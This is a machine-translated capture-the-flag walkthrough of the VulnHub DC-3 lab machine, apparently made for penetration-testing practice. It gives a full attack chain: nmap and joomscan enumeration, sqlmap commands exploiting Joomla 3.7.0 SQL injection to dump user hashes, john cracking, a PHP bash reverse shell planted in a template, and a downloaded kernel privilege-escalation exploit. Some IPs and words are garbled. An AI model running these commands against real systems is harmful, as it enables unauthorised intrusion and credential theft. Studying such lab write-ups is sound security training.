11
1, Environmental matching of target aircraft
Attack aircraft (KALI): 192.168.226.128
Target (DC-1): 192.168.226.129 (unknown)
Target address: DC: 3.2 ~ VulnHub
2, Pre war preparation
two point one IP address confirmation
Command: ARP scan - L Scan all LAN devices (IP, MAC address and manufacturer information of all devices)
ARP scan command: it is an ARP command line scanning tool for system discovery (it can discover hidden devices in the local network). It can construct and send ARP requests to the specified IP address, and display all returned responses.
ARP scan can display all connected devices in the local network, even if they have firewalls. The firewall device can shield ping, but it cannot shield ARP packets.
2.2 port scanning
nmap -T4 -sV -O -A -p- 192.168.226.129 -T4(speed) -sV(Version scanning and open services) -O(operating system) -p-(All ports)
2.3 website scanning
use dirb http://192.168.226.129 Find administrator login interface
two point four Visit the web page for information
There is no ssh service, but we have found the background login interface and can only raise the right step by step
2.5 view website structure
We can see that CMS is joomla, which is a software system developed using PHP language and MySQL database
Three PHP CMS websites: Drupal, Wordpress and Joomla
3, Penetration start
1, flag1
1.1. Obtain the version of joomla professional tools
joomscan --url http://192.168.226.129
Through Wappalyzer Firefox plug-in, it is found that the target web page CMS is Joomla, use the special tool joomscan To scan Joomla
The command to install the joomscan tool in kali is sudo apt get install joomscan
Scan to target page joomla version is 3.7.0
1.2. Vulnerability exploitation
Use the searchsploit tool to find the vulnerability in Joomla version 3.7.0
searchsploit Joomla 3.7.0
Confirm that the version is sql injection vulnerability
1.3. Vulnerability query
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt View vulnerability file
1.4 blasting
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
-- dbs database Guess user data in joomlab
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
-D "joomladb" --tables specifies all tables in the database joomladb We found the user table
sqlmap -u "http://192.168.226.1239/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
-D "joomladb" - t "##u users" -- columns specifies the user table field in joomladb database
sqlmap -u "http://192.168.226.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]
sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]
- D "joomladb" -T "#__users" -C id,nmae,password,username Explodes the specified field
We found the user name and password, but the password is encrypted
1.5 password cracking
Create a new file, write in the password, and use john to crack the password
Find password snoopy
Login background http://192.168.226.129/administrator
Upload a one sentence script in index.php, enable kali to listen, and visit the index web page again to execute the script
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.226,128/1212 0>&1' "); ?> http://192.168.226.129/templates/beez3/index.php index and uploaded scripts are in the beez3 directory
View version information and find vulnerability Library
whoami lsb_release -a cat /etc/issue
Copy vulnerability information to local
searchsploit ubuntu 16.04 cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/ cat 39772.txt
3. Infiltration and right raising
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip #Unzip the 29772.zip file cd 39772 tar -xvf exploit.tar #Unzip the exploit authorization script tar package cd ebpf_mapfd_doubleput_exploit
ls ./compile.sh #Execute the script and compile the file ls ./doubleput #Executive right raising document
whoami cd /root ls cat the-flag.txt